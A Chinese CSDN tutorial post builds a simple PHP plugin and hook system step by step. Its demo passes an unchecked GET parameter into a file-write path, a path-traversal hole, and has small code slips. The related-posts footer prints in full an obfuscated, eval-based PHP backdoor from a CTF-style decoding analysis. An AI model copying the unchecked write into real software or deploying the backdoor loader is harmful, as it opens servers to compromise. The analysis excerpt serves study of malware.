(插件设计与简单应用)php中钩子(hook)的应用示例demo

我们先来回顾下原本的开发流程;
产品汪搞出了一堆需求;
当用户注册成功后需要发送短信、发送邮件等等;
然后聪明机智勇敢的程序猿们就一扑而上;
把这些需求转换成代码扔在 用户注册成功 和 跳转到首页 之间;

没有什么能够阻挡;充满创造力的猿们;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
 
class  Test{
     public  function  index(){
         // 用户注册成功
 
             /*
               此处是一堆发送短信的代码
             */
            
            /*
               此处是一堆发送邮件的代码
             */
            
            /*
               此处是一堆其他功能的代码
             */
 
         // 前往网站首页
     }
}
 
$test = new  Test();
$test ->index();

如果每个功能都由不同的猿完成的话;
首先面临的就是代码会很杂乱;配合起来会比较麻烦;
那封装成函数吧;一方面会规范整洁写;另外方便重复调用;

没有什么能够阻挡;充满创造力的猿们;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
 
class  Test{
     public  function  index(){
         // 用户注册成功
 
         // 发送短信
         sendSms( $phone );
         // 发送邮件
         sendSms( $email );
         // 其他操作...
         
         // 前往网站首页
     }
}
 
/**
  * 发送短信通知
  * @param  integer $phone 手机号
  */
function  sendSMS( $phone ){
     // 此处是发送短信的代码
}
 
/**
  * 发送邮件通知
  * @param  string $email 邮箱地址
  */
function  sendEmail( $email ){
     // 此处是发送邮件的代码
}

这时候运营喵表示;
如果能在后台点点按钮就能设置是发邮件还是发短信;那想必是极好的;

没有什么能够阻挡;充满创造力的猿们;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
 
class  Test{
     public  function  index(){
         // 用户注册成功
 
         if  ( '如果设置了发送短信' ) {
             // 发送短信
             sendSms( $phone );
         }
         
         if  ( '如果设置了发送邮件' ) {
             // 发送邮件
             sendSms( $email );
         }
         
         // 其他操作...
         
         // 前往网站首页
     }
}
 
/**
  * 发送短信通知
  * @param  integer $phone 手机号
  */
function  sendSMS( $phone ){
     // 此处是发送短信的代码
}
 
/**
  * 发送邮件通知
  * @param  string $email 邮箱地址
  */
function  sendEmail( $email ){
     // 此处是发送邮件的代码
}

在一个封闭企业环境下这样搞是没有问题的;
然鹅;我们还有一位开放无私的猿领导要把程序开源出去造福其他猿类;
希望有更多的猿类来参与这个项目;共同开发功能;
如果大家都去改动这套程序;把自己的代码扔在 用户注册成功 和 跳转到首页 之间;
这显然是不靠谱的;想想都混乱的一塌糊涂;

那可不可以大家把自己写的代码放到某个目录下;
然后系统自动的根据配置项把这些代码加载到 用户注册成功 和 跳转到首页 之间呢?
好先定义如下目录

1
2
3
4
5
6
7
8
9
10
11
12
├─plugin  // 插件目录
│  ├─plugin1  // 插件1
│  │  ├─config.php  // 插件1的配置项
│  │  ├─index.php  // 插件1的程序处理内容
│  ├─plugin2
│  │  ├─config.php
│  │  ├─index.php
│  ├─plugin3
│  │  ├─config.php
│  │  ├─index.php
│  ├─...
├─index.php  // 业务逻辑


业务逻辑的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php
 
class  Test{
     public  function  index(){
         // 用户注册成功
             
         // 获取全部插件
         $pluginList =scandir( './plugin/' );
         // 循环插件 // 排除. ..
         foreach  ( $pluginList  as  $k  =>  $v ) {
             
             if  ( $v == '.'  ||  $v == '..' ) {
                 unset( $pluginList [ $k ]);
             }
         }
         echo  "简易后台管理<hr>" ;
         // 插件管理
         foreach  ( $pluginList  as  $k  =>  $v ) {
             // 获取配置项
             $config = include  './plugin/' . $v . '/config.php' ;
             $word = $config [ 'status' ]==1 ?  '点击关闭'  '点击开启' ;
             echo  $config [ 'title' ]. '<a href="./index.php?change=' . $v . '">' . $word . '</a><br />' ;
         }
         echo  '<hr>' ;
         // 输出插件内容
         foreach  ( $pluginList  as  $k  =>  $v ) {
             // 获取配置项
             $config = include  './plugin/' . $v . '/config.php' ;
             if  ( $config [ 'status' ]==1) {
                 include  './plugin/' . $v . '/index.php' ;
                 // 运行插件
                 Hook::run( $v );
             }
         }
 
         // 前往网站首页
     }
}
 
// 插件类
class  Hook{
     // 注册添加插件
     public  static  function  add( $name , $func ){
         $GLOBALS [ 'hookList' ][ $name ][]= $func ;
     }
 
     // 执行插件
     public  static  function  run( $name , $params =null){
         foreach  ( $GLOBALS [ 'hookList' ][ $name as  $k  =>  $v ) {
             call_user_func( $v , $params );
         }
     }
}
 
// 更改插件状态
if  (isset( $_GET [ 'change' ])) {
     // 获取到配置项
     $config = include  './plugin/plugin' . substr ( $_GET [ 'change' ],-1). '/config.php' ;
     // 如果是开启 那就关闭 如果是关闭 则开启
     $config [ 'status' ]= $config [ 'status' ]==1 ? 0: 1;
     // 将更改后的配置项写入到文件中
     $str = "<?php \r\n return " .var_export( $config ,true). ';' ;
     file_put_contents ( './plugin/' . $_GET [ 'change' ]. '/config.php' $str );
     header( 'Location:./' );
}
 
$test = new  Test();
$test ->index();


插件配置项代码:

1
2
3
4
5
<?php 
  return  array  (
   'status'  => 1,  // 定义状态 1表示开启  0表示关闭
   'title'  =>  '发送短信' // 插件的名称
);


插件的内容:

1
2
3
4
5
6
<?php
 
 
Hook::add( 'plugin1' , function (){
     echo  '发送短信的内容<br />' ;
});


demo源代码:传送门
demo的在线演示:传送门

没错;这就是插件的思想;
当然这只是一个超级简单的示例;
完整的插件机制要包括插件的类型、数据库、审核等等;
如果使用过wordpress或者国内的discuz;
你就会发现一个好的程序并不仅仅是自身多么优秀;
而且重要的就是设计的扩展性有多好;能多方便的让大家去扩展它的功能;
想对插件深入研究的话;建议去阅读wordpress、discuz的源代码;

已标记关键词 清除标记
相关推荐
CTF/php后门分析经常遇到加密压缩过的PHP文件, <? $O00OO0=urldecode("n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iQk9DWm1LUHF5bkR4QWJmR05FdW90c2pkUlljcmlKTXdWZ0ZVenZYTGthVFNwSWxoZUhRV1dITmZhQ0d5b3RzanBRTFN3WXpyYmx4aERjQXZUT1VQUklpdW1aSmVrbktkcWdNVlhGRUJHczh3TmFWTWNCRE1BVElURTI5emhTUnpoTjEwWEpXTUhUVzBmSlYwZTJWMFFCUDdnU3dyY0pPbWZKRTloSkRhZUtJVENLbElzRXFxZlRJVmZhTWxmUjlNWFNNbWhGVXJPbzRaZlNpMGNkOXFRdHcwY0JqbGVhalpjMmx0Q2Rrd050bHdOVHBJZ05XcmZCaWtmSmdyZ2tqWmMyaTBuQjl6SFRwWm5CNW1oU2lsUU45cVFhRE1YTjVQbkZwVENLbHdOVHBJZ05XTVhTTTBIUDBDTEUwQ2ZTUmFuQjVNQ05oV3VpV0x1azlHUk5BbGdGdzBBTTlvZkpXbGNCd01DTmhBSk5BbGdOQVpPb1BJZlNNb1FhaWJmZFZMSjBmT0tZUkxKb2txQ0tsd05UOHlnSEI2TUhYdXlIQkV4WFh0bEZoM2hvNVZmUzFxUWE0emMyNHllUDBDZlNSYW5CNU1DTmhXdWlXTEtraXdEZEFsZ05oVkFGcHRDS2x3TlQ4eWdIQjZNSFh1eUhYUXZ6QjlNZHJac0Vxa2ZCZnFRYXVyTzBpRXVpOUVFUkRnT29QSU9vNFpjMjFtaFNpWmVvQXFIUDBDZW9ySTVxQlA1cjJ6NTV6ejVRMlJDVDh3TmFETWZhTXpmZEl0dVlNSEowRFdSWWlMdVlpdWROQWxnTkF6ZTJEVmhTWVpPb2s3c0VyWkNUc2FUbnRNbGZKdGE2N01aZnV5ZVAwQ2ZTUmFuQjVNQ05oaUJpRGlLa0RMdVlpdWROQWxnWWlFdWk5RUVSRGdnTjRJTzBSNGhTUnpmTjh0Q0tsd05UOHlnSGFpeFhYOXZ6bkJWK2Q3YnpYUXZ6QjlNZHJac0Vxa2ZCZnFRYXVyTzB3R0trZkx1WWl1ZE5BbGdpV09LTTlZRVJEV0oxV1dSWUlJZVRwdGMyOXpmYU10ZW9BcUhQMENlb3JJNXFCUDVyMno1NXp6NVEyUkNUOHdOYURNZmFNemZkSXR1TVJIUllNd0RSOUVFUkRnT29QSU9vNFpKM08xUXREcVFCdVpPb2s3c0VyWkNUV2dSWTFVNmYyZjVyTlc1cW5GNWV6MjU1eno1UTJSQ1Q4d05UOFpmU1JhbkI1TUNOaGdSWTFVSjFXV1JZSXRlTldFZHU1TERZaXVFUjlFRVJEZ2dONElPMlYwUUJQWk9vazdzRXJaQ1RXWUR1T1JEK0I4SUhCaWxvclpzRXFrZkJmcVFhdXJPMGlFdWk5WUR1T1JEb0FsZ1NmVlFGd01DS2x3TnRPTUFKUnFBYXVyZ1Q0WmMyOW9mZDl1blNNem4xV2d1Tjl1blNNem4xV2d1TjVQbkZwVENLbHdOSTBDc0VyL0dJPT0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> 编译环境 ===================================================================== PHP : /usr/bin/php7.2 PHP_SAPI : cli PHP_VERSION : 7.2.9-1 ZEND_VERSION: 3.2.0 PHP_OS : Linux - Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64 INI actual : /root/temp/evalhook/tmp-php.ini More .INIs : CWD : /root/temp/evalhook Extra dirs : VALGRIND : Not used ===================================================================== TIME START 2019-01-04 07:46:12 ===================================================================== php -d extension=evalhook.so encoded_script.php 可直接dump大部分加密php文件eval的内容
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页